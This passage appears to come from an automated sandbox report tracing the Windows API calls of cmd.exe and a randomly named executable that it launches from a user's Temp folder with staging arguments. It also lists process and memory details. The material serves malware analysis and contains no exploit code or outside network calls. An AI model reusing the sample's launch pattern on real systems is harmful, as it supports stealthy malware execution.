_String2="CALL") returned -65 [0092.982] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0092.982] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0092.982] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0092.982] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0092.982] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0092.982] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0092.982] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0092.982] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0092.982] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0092.982] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0092.982] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0092.983] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0092.983] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0092.983] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0092.983] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0092.983] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0092.983] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0092.983] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0092.983] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0092.983] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0092.983] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0092.983] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0092.983] SetErrorMode (uMode=0x0) returned 0x0 [0092.983] SetErrorMode (uMode=0x1) returned 0x0 [0092.983] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x2604b0, lpFilePart=0x16f50c | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x16f50c*="Temp") returned 0x23 [0092.983] SetErrorMode (uMode=0x0) returned 0x1 [0092.983] NeedCurrentDirectoryForExePathW 
(ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0092.983] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0092.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0092.986] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", fInfoLevelId=0x1, lpFindFileData=0x16f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f2a8) returned 0x262478 [0092.986] FindClose (in: hFindFile=0x262478 | out: hFindFile=0x262478) returned 1 [0092.987] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0092.987] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0092.987] GetConsoleTitleW (in: lpConsoleTitle=0x16f780, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.987] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f608, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f6d0 | out: lpAttributeList=0x16f608, lpSize=0x16f6d0) returned 1 [0092.987] UpdateProcThreadAttribute (in: lpAttributeList=0x16f608, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f6c8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f608, lpPreviousValue=0x0) returned 1 [0092.987] GetStartupInfoW (in: lpStartupInfo=0x16f5c4 | out: lpStartupInfo=0x16f5c4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) 
returned 2 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0092.987] 
_wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0092.988] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0092.988] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0092.988] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0092.988] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0092.988] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0092.988] lstrcmpW (lpString1="\\CNuu8Vyt.exe", lpString2="\\XCOPY.EXE") returned -1 [0092.989] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16f664*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f6b0 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", lpProcessInformation=0x16f6b0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xac4, dwThreadId=0xac8)) returned 1 [0093.233] CloseHandle (hObject=0x4c) returned 1 
[0093.233] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0093.233] GetEnvironmentStringsW () returned 0x262cf0* [0093.233] FreeEnvironmentStringsW (penv=0x262cf0) returned 1 [0093.233] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0093.974] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x16f5a4 | out: lpExitCode=0x16f5a4*=0x0) returned 1 [0093.974] CloseHandle (hObject=0x50) returned 1 [0093.974] _vsnwprintf (in: _Buffer=0x16f6ec, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f5b0 | out: _Buffer="00000000") returned 8 [0093.974] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0093.974] GetEnvironmentStringsW () returned 0x262498* [0093.974] FreeEnvironmentStringsW (penv=0x262498) returned 1 [0093.975] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0093.975] GetEnvironmentStringsW () returned 0x262498* [0093.975] FreeEnvironmentStringsW (penv=0x262498) returned 1 [0093.975] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f608 | out: lpAttributeList=0x16f608) [0093.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.975] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0093.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.975] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0093.975] _get_osfhandle (_FileHandle=0) returned 0x3 [0093.975] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0093.975] SetConsoleInputExeNameW () returned 0x1 [0093.975] GetConsoleOutputCP () returned 0x1b5 [0093.975] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0093.975] SetThreadUILanguage (LangId=0x0) returned 0x409 [0093.975] exit (_Code=0) Process: id = "5" image_name = "cnuu8vyt.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe" page_root = "0x7ea16600" os_pid = "0xac4" 
os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xaac" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 341 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 342 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 343 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 344 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "cnuu8vyt.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe") Region: id = 345 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 346 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 347 start_va = 0x7ffb0000 end_va = 0x7ffd2fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 348 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 349 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 350 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 351 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 352 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 353 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 354 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 355 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 356 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 357 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 358 start_va = 
0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 359 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 360 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 361 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 362 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 363 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 364 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 365 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 366 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 367 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 368 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" 
Region: id = 369 start_va = 0x1210000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 452 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 453 start_va = 0x1210000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 454 start_va = 0x13c0000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 470 start_va = 0x1210000 end_va = 0x12eefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 471 start_va = 0x12f0000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 472 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 473 start_va = 0x150000 end_va = 0x152fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 474 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Thread: id = 5 os_tid = 0xac8 [0093.253] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x767e91a0, dwHighDateTime=0x1d440a9)) [0093.253] GetCurrentProcessId () returned 0xac4 [0093.254] GetCurrentThreadId () returned 0xac8 [0093.254] GetTickCount () returned 0x229cd [0093.254] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=15004284522) returned 1 [0093.254] GetStartupInfoW (in: 
lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0093.254] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0093.255] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0093.255] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0093.255] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0093.255] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0093.255] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0093.256] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0093.256] GetCurrentThreadId () returned 0xac8 [0093.256] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13c07d0)) [0093.256] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0093.256] GetFileType (hFile=0x3) returned 0x0 [0093.257] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0093.257] GetFileType (hFile=0x7) returned 0x0 [0093.257] GetStdHandle 
(nStdHandle=0xfffffff4) returned 0xb [0093.257] GetFileType (hFile=0xb) returned 0x0 [0093.257] SetHandleCount (uNumber=0x20) returned 0x20 [0093.257] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.257] GetEnvironmentStringsW () returned 0x17fc80* [0093.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0093.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x13c11f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0093.257] FreeEnvironmentStringsW (penv=0x17fc80) returned 1 [0093.257] GetLastError () returned 0x6 [0093.257] SetLastError (dwErrCode=0x6) [0093.257] GetLastError () returned 0x6 [0093.257] SetLastError (dwErrCode=0x6) [0093.257] GetLastError () returned 0x6 [0093.257] SetLastError (dwErrCode=0x6) [0093.257] GetACP () returned 0x4e4 [0093.257] GetLastError () returned 0x6 [0093.257] SetLastError (dwErrCode=0x6) [0093.257] IsValidCodePage (CodePage=0x4e4) returned 1 [0093.257] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0093.257] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0093.257] GetLastError () returned 0x6 [0093.257] SetLastError (dwErrCode=0x6) [0093.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0093.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, 
cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0093.258] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0093.258] GetLastError () returned 0x6 [0093.258] SetLastError (dwErrCode=0x6) [0093.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0093.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ횋খശAĀ") returned 256 [0093.258] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 
!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ횋খശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0093.258] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ횋খശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" 